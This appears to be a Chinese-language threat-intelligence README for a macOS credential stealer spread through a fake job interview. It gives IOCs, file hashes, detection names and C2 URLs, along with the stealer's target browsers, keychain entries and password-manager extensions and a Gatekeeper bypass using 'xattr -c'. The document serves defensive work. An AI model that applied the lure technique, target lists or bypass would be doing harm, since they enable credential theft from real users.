分析文本和脚本以MIT许可证发布。IOC列表和威胁情报内容仅供防御目的;根据许可证条款允许在商业产品中重复使用。
在沙盒环境中进行独立逆向工程。加密配置通过静态分析和每个辅助CPU模拟恢复。请参阅scripts/decrypt_all.py和SECURITY.md。
| 文件 | 格式 | 用途 |
|---|
iocs.txt | 纯文本 | 哈希、域名、URL、IP、邮箱、Sentry ID — 粘贴到黑名单、MISP、OpenCTI |
yara_rules.yar | YARA 4.2+ | 已知样本哈希匹配 + Mach-O 启发式字符串检测 |
sigma_rules.yml | Sigma | 代理、DNS 和进程创建规则 — 调整 logsource 以适应你的 SIEM |
stix/bundle.json | STIX 2.1 | 机器可读的CTI包,包含指标、恶意软件SDO、基础设施、ATT&CK模式及关系 |
attack-navigator-layer.json | ATT&CK Navigator | 导入 ATT&CK Navigator 查看可视化技术覆盖率 |
| 元素 | 详情 |
|---|
| 平台 | Wellfound (AngelList) — 正规求职网站 |
| 公司名称 | “HyperHive”(单数) / 域名 hyperhives.net |
| 虚拟身份 | “Felix” |
| 联系邮箱 | [email protected] |
| 建立信任 | 引用了目标真实的简历、LinkedIn 信息及具体技术技能 |
| 借口 | “面试前先体验产品” |
| 触发载荷 | 在 hyperhives.net 上操作“设置 → 诊断 → 日志” |
| 时间安排 | 虚假面试时间段(4月8日 15:00 UTC)以制造紧迫感 |
| 多步链条 | 载荷投递前至少两封邮件,历时两天 |
| 属性 | 值 |
|---|
| 文件 | installer_binary |
| 大小 | 8,504,768 字节 |
| 格式 | Mach-O 通用(x86_64 + arm64) |
| SHA-256 | 5c7385c3a4d919d30e81d851d87068dfcc4d9c5489f1c2b06da6904614bf8dd3 |
| SHA-1 | 2de897066c2fc7db91da78d7f9ded99237345077 |
| MD5 | 0e95ab4038ec48657563c96bed840dd5 |
| 编译器 | rustc 1.87.0 (stable) |
| 构建用户 | rootr(来自嵌入路径 /Users/rootr/.cargo/registry/...) |
| 构建代号 | force |
| 构建版本 | 9.12.1 |
| 错误追踪 | Sentry Rust SDK v0.36.0 |
| crate 数量 | 97(参见 output/cargo_dependencies.txt) |
| 引擎 | 检测名称 |
|---|
| Kaspersky | HEUR:Trojan-PSW.OSX.HashBreaker.e |
| DrWeb | Mac.PWS.JobStealer.1 |
| ESET-NOD32 | OSX/PSW.Agent.BX Trojan |
| Microsoft | Trojan:MacOS/Stealer!AMTB |
| Avast / AVG | MacOS:Stealer-BU [Trj] |
| Elastic | Malicious (high Confidence) |
| Cynet | Malicious (score: 99) |
| SentinelOne | Static AI - Suspicious Mach-O |
| 浏览器 | 数据路径 | 钥匙串条目 |
|---|
| Chrome | Google/Chrome | Chrome Safe Storage |
| Brave | BraveSoftware/Brave-Browser | Brave Safe Storage |
| Opera | 默认 | Opera Safe Storage |
| Opera GX | 默认 | Opera Safe Storage 2023 |
| Vivaldi | 默认 | Vivaldi Safe Storage |
| Microsoft Edge | 默认 | Microsoft Edge Safe Storage |
| Arc | Arc/User Data | — |
| CocCoc | 默认 | CocCoc Safe Storage |
| 产品 | 扩展ID(示例) |
|---|
| 1Password | aeblfdkhhhdcdjpifhhbdiojplfjncoa、khgocmkkpikpnmmkgmdnfckapcdkgfaf、gejiddohjgogedgjnonbofjigllpkmbf |
| ProtonPass | ghmbeldphafepmbegfdlkpapadhbakde |
| Dashlane | fdjamakpfbbddfjaooikfcpapjohcfmg |
| Deloitte Credentials | 企业凭证存储 |
| Gatekeeper 绕过 | 对下载的二进制文件执行 xattr -c |
| VPN 感知 | “请使用 VPN 并重试”错误信息 |
https://cloudproxy.link/m/decode| 指令 / 配置通道 |
https://cloudproxy.link/db/debug | 调试 / 诊断 |